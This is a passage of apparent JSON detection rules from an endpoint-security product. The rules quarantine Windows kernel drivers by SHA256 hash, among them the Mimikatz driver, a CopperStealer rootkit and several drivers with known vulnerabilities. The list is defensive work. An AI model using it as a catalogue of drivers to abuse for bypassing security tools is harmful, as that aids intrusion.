"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0937fde1-6c10-563d-8c36-b9fe95661faa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605043Z", + "creation_date": "2026-03-23T11:45:29.605045Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + 
"hl_testing_start_time": "2026-03-23T11:45:29.605051Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1a34c260e59a33c93b89417344f943a2d1dfb0006359a6fc946a41d0e9d36a55", + "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "094374ed-37c6-5e53-82f1-8197905cdc0d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.977261Z", + "creation_date": "2026-03-23T11:45:29.977263Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.977268Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fa9abb3e7e06f857be191a1e049dd37642ec41fb2520c105df2227fcac3de5d5", + "comment": "Malicious CopperStealer Rootkit (aka windbg.sys) [https://www.proofpoint.com/us/blog/threat-insight/now-you-see-it-now-you-dont-copperstealer-performs-widespread-theft] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0945e067-efd2-589b-b659-84177636ba9d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + 
"rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615031Z", + "creation_date": "2026-03-23T11:45:29.615033Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615038Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f088b2ba27dacd5c28f8ee428f1350dca4bc7c6606309c287c801b2e1da1a53d", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0954e921-cad3-5e67-bbe4-f4eb3688a90c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.490102Z", + "creation_date": "2026-03-23T11:45:31.490104Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.490110Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"6f3f1ffc8021b028288ce44c4f5cf948538587f3c8150de34c2685f487ce184c", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "098bf438-d172-56b8-bc7f-88b7a2bd2f52", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.828601Z", + "creation_date": "2026-03-23T11:45:31.828603Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.828608Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9337b3565c8221513bddfa2454c6657438b42231b0482a9fc7d8f16b0ecd25f6", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0991e203-e53b-56b3-8788-ebd56ca7696e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + 
"last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156921Z", + "creation_date": "2026-03-23T11:45:31.156923Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156929Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "322d5a01c73af710e2ffabdb1622201b55025ea106b8c876ffc9b4bda156ff58", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "099233ba-9eb3-5001-a197-f2d85d26ec98", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.832549Z", + "creation_date": "2026-03-23T11:45:30.832551Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.832557Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "18bc25605b2b6fc7195a7606a7ca6a22002e5e6ce7b864e33b08256fa3cfc0f7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware 
Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0998903c-fe2c-51af-9b1a-d6b598b200ce", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.970837Z", + "creation_date": "2026-03-23T11:45:29.970840Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.970848Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0713a541b70f58bbcd1807c69ae855e9ce041b807e34978df6c1e9357c53acef", + "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "099b45a0-daf7-5809-8286-0a614edf0f89", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.460379Z", + "creation_date": "2026-03-23T11:45:30.460382Z", + "enabled": true, + 
"block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.460391Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0e10d3c73596e359462dc6bfcb886768486ff59e158f0f872d23c5e9a2f7c168", + "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "09a0762e-2166-5697-845e-bef85c448ffc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.475769Z", + "creation_date": "2026-03-23T11:45:30.475772Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.475781Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a2d32c28eb5945b85872697d7cfbe87813c09a0e1be28611563755f68b9cb88b", + "comment": "Malicious Kernel Driver (aka 6771b13a53b9c7449d4891e427735ea2.sys) [https://www.loldrivers.io/drivers/ddca6daf-4932-4e82-ad3c-d92d47632ea4/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "09a35e83-2f7a-509d-aaad-9a6dc1a143d5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + 
"global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.143485Z", + "creation_date": "2026-03-23T11:45:32.143487Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.143493Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0cb429e6daaba89111d2edb3e01ef1d8ac9b90813b9d80292fe8050287a63146", + "comment": "Vulnerable Kernel Driver (aka wsdkd.sys) [https://www.loldrivers.io/drivers/a8f2da2a-369c-4b4d-9a00-d7a892b9f7c3/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "09a9b916-bd7b-5052-af92-0252a6b02915", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.829324Z", + "creation_date": "2026-03-23T11:45:30.829326Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.829331Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + 
"type": "hash", + "value": "d4213c339e98d7f0f363dcfc282b8bac31c67870f7d877a6c7215dc2119660fa", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "09b0c853-85bf-54cd-a518-6abb579425f4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621564Z", + "creation_date": "2026-03-23T11:45:29.621566Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621571Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7e3b0b8d3e430074109d85729201d7c34bc5b918c0bcb9f64ce88c5e37e1a456", + "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "09c2585e-54b7-5a6d-9c74-43e356a1f07d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.491007Z", + "creation_date": "2026-03-23T11:45:31.491010Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.491018Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "afa9b3a1cb40dce9b9b524a72376159f9defcb47f29330afccec9bfb616227d8", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "09d1c951-b169-5cb7-b910-d7dda62c52fd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.608579Z", + "creation_date": "2026-03-23T11:45:29.608581Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608586Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f6b082a294c1a85bf69a3f4a7e20536291372b53569bd562f1008eb5cf7228cd", + "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] 
[https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "09dc31e7-127d-586f-a47d-53c043066582", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.146222Z", + "creation_date": "2026-03-23T11:45:31.146224Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.146229Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "febbb87b9c9081515f8b70e7bbd1f22ea0ec89f5cf5e2f0dc2e129fa48126130", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "09f49d45-0a9c-509f-a709-1a9f3e9d96ef", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.154840Z", + "creation_date": 
"2026-03-23T11:45:31.154842Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.154847Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d6607075c558ba471c6678c1bca63a601cfc8319f6ed99d21fefe37467670097", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "09f60b6a-f763-592b-afee-9c74aa2881fa", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.495904Z", + "creation_date": "2026-03-23T11:45:31.495906Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.495911Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2ce9c1e9b1126e80b0aa0705ee7ab85052b9397601ad7f9c1c83dff3819caeff", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ 
+ "id": "0a0dc9c4-e3f7-5852-898a-c7b6d202e4a3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.617971Z", + "creation_date": "2026-03-23T11:45:29.617973Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617979Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "20dd9542d30174585f2623642c7fbbda84e2347e4365e804e3f3d81f530c4ece", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0a1a2d59-132b-5c6b-824f-139e92303293", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611584Z", + "creation_date": "2026-03-23T11:45:29.611586Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + 
"endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.611591Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "66cc007348a41fb33fab59f5ea265006534ba82db4eb7327039cbe2b4ce7e077", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0a2208d9-53d4-5fd5-9e59-9ef6103c2146", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.605664Z", + "creation_date": "2026-03-23T11:45:29.605666Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.605671Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3c7e5b25a33a7805c999d318a9523fcae46695a89f55bbdb8bb9087360323dfc", + "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0a22df87-9594-59c1-ac75-befa3c6bf7dd", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.156038Z", + "creation_date": "2026-03-23T11:45:31.156040Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.156045Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9f42d07ed108ef9de0b48f2bfd0f2d427d9c5241873447167744ff3b7472449a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0a22f1b9-9f22-58cd-a12c-a219038f8d59", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615765Z", + "creation_date": "2026-03-23T11:45:29.615767Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615772Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "f8ffb8a23be71c26f784905110b7e752473be55216300d08a83c40c1496fb6c1", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0a2ad231-5a70-5535-9ef1-0535e61cc99a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.157118Z", + "creation_date": "2026-03-23T11:45:31.157120Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.157125Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f07b4f831e0d5e9be4c6a9a188ac6a4e3ca45f1abdea83e7480d101774a6a3e7", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "0a3d3ba8-1176-5e41-a0d4-b5b436a54b07", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + 
